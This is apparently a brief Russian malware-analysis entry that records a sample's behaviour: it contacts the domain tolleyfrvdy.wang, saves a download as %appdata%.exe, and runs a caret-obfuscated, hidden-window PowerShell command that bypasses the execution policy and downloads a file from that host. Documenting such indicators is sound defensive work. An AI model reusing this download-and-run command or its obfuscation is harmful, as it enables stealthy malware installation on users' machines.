Техническая информация
- http://tolleyfrvdy.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "poWErsHeLL^.^exe^ -E^xe^cu^ti^ONPOLiCY^ B^YP^aS^s ^-n^o^P^rOf^ILE -^wi^N^DOwsT^y^LE^ HiDD^eN ^(Ne^W-^OBJE^cT^ SYSt^e^M.^n^et.W^E^bcL^i^ENT).d^ownLoa^dF^Ile('http://tolleyfrvd...
- DNS ASK to####frvdy.wang
- '<SYSTEM32>\cmd.exe' /C "poWErsHeLL^.^exe^ -E^xe^cu^ti^ONPOLiCY^ B^YP^aS^s ^-n^o^P^rOf^ILE -^wi^N^DOwsT^y^LE^ HiDD^eN ^(Ne^W-^OBJE^cT^ SYSt^e^M.^n^et.W^E^bcL^i^ENT).d^ownLoa^dF^Ile('http://tolleyfrvd...' (со скрытым окном)